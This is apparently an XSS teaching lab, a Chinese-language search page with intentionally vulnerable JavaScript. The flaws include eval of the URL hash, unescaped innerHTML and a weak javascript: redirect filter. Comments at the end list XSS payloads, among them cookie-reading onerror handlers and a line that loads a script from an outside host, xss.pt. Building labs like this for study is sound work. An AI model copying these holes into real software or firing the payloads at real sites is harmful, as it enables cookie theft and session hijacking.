<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <title>WEB安全</title>
        <style type="text/css">
            #container{
                width: 600px;
                margin: 200px auto;
            }
            #logo{
                margin: 20px 0;
                position:relative;
                animation: uihLogo 10s;
                animation-delay: 2s;
                animation-fill-mode: forwards;
                animation-timing-function: ease-in-out;
            }
            @keyframes uihLogo{
                0%   {left:0px; }
                20%  {left:200px;}
                40%  {left:400px;}
                60%  {left:200px; }
                80%  {left:190px; }
                100%  {left:180px; }
            }
            #search{
                width: 443px;
                padding-right: 87px;
                height: 16px;
                padding: 12px 16px;
                font-size: 16px;
                margin: 0;
                vertical-align: top;
                outline: 0;
                box-shadow: none;
                border-radius: 10px 0 0 10px;
                border: 2px solid #c4c7ce;
                background: #fff;
                color: #222;
                overflow: hidden;
                box-sizing: content-box;
                -webkit-tap-highlight-color: transparent;
            }
            button{
                cursor: pointer;
                width: 108px;
                height: 44px;
                line-height: 45px;
                padding: 0;
                background: 0 0;
                background-color: #0D485A;
                border-radius: 0 10px 10px 0;
                font-size: 17px;
                color: #fff;
                box-shadow: none;
                font-weight: 400;
                border: none;
                outline: 0;
            }
        </style>
    </head>
    <body>
        <div id="container">
            <div id="logo">
                <img src="https://www.united-imaging.com/assets/image/font_img/UIHC_whiteBG_CN_logo.svg" />
            </div>
            <input type="text" id='search' value="" />
            <button type="submit" onclick="getKeyword()">搜索</button>
            <p id='show'></p>
            <a id="redirect" href="">历史记录</a>
        </div>
    </body>
    <script>
        function request (keyword) {
            return new Promise((resolve) => {
                var xhr = new XMLHttpRequest();
                xhr.withCredentials = true;
                xhr.open('get', 'http://localhost:3001/search?keyword='+keyword, true);
                xhr.send();
                xhr.onreadystatechange = async function () {
                    if(xhr.status === 200 && xhr.readyState === 4){
                        var response = JSON.parse(xhr.responseText)
                        resolve(response.keyword);
                    }
                }
            })

        }
        window.onload = async function () {
            eval(location.hash.substr(1))
            const { search, redirect_to } = document.location;
            if(search.length){
                const keyword = search.split('?keyword=')[1] || '';
                if(keyword){
                    const res = await request(keyword);
                    document.getElementById('search').value = res;
                    document.getElementById('show').innerHTML=`您搜索的是: ${htmlEscape(res)}`
                }

                const redirect_to = search.split('?redirect_to=')[1] || '';
                const xss = redirect_to.startsWith('javascript:');
                if(!xss){
                    document.getElementById('redirect').href=redirect_to;
                }else{
                    document.getElementById('redirect').href='/404';
                }
                // document.getElementById('redirect').href=redirect_to;
            }
        }
        async function getKeyword(){
            var keyword = document.getElementById('search').value;
            const res = await request(keyword);
            document.getElementById('show').innerHTML=`您搜索的是: ${res}`
        }

        function htmlEscape(text){
            return text.replace(/[<>"&]/g, function(match, pos, originalText){
                switch(match){
                    case "<": return "&lt;";
                    case ">":return "&gt;";
                    case "&":return "&amp;";
                    case "\"":return "&quot;";
                }
            });
        }
    </script>
    <!-- <script>alert('XSS攻击!')</script> -->
    <!-- <script>${alert('XSS攻击!')}</script> -->
    <!-- ><script type='text/javascript'>alert('XSS攻击');</script><a b= -->
    <!-- <img src=1 onerror="alert('XSS Attack')"> -->
    <!-- <img src=1 onerror="alert(document.cookie)"> -->
    <!-- http://localhost:5500/security/xss/xss.html?keyword=<img src=1 onerror="alert('XSS Attack')"> -->
    <!-- http://localhost:5500/security/xss/xss.html?keyword=<img src=1 onerror="alert(document.cookie)"> -->
    <!-- http://localhost:5500/security/xss/xss.html?redirect_to=javascript:alert('XSS Attack') -->
    <!-- http://localhost:5500/security/xss/xss.html?redirect_to=javascript:alert(document.cookie) -->
    <!-- <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xss.pt/jDGn';> -->
</html>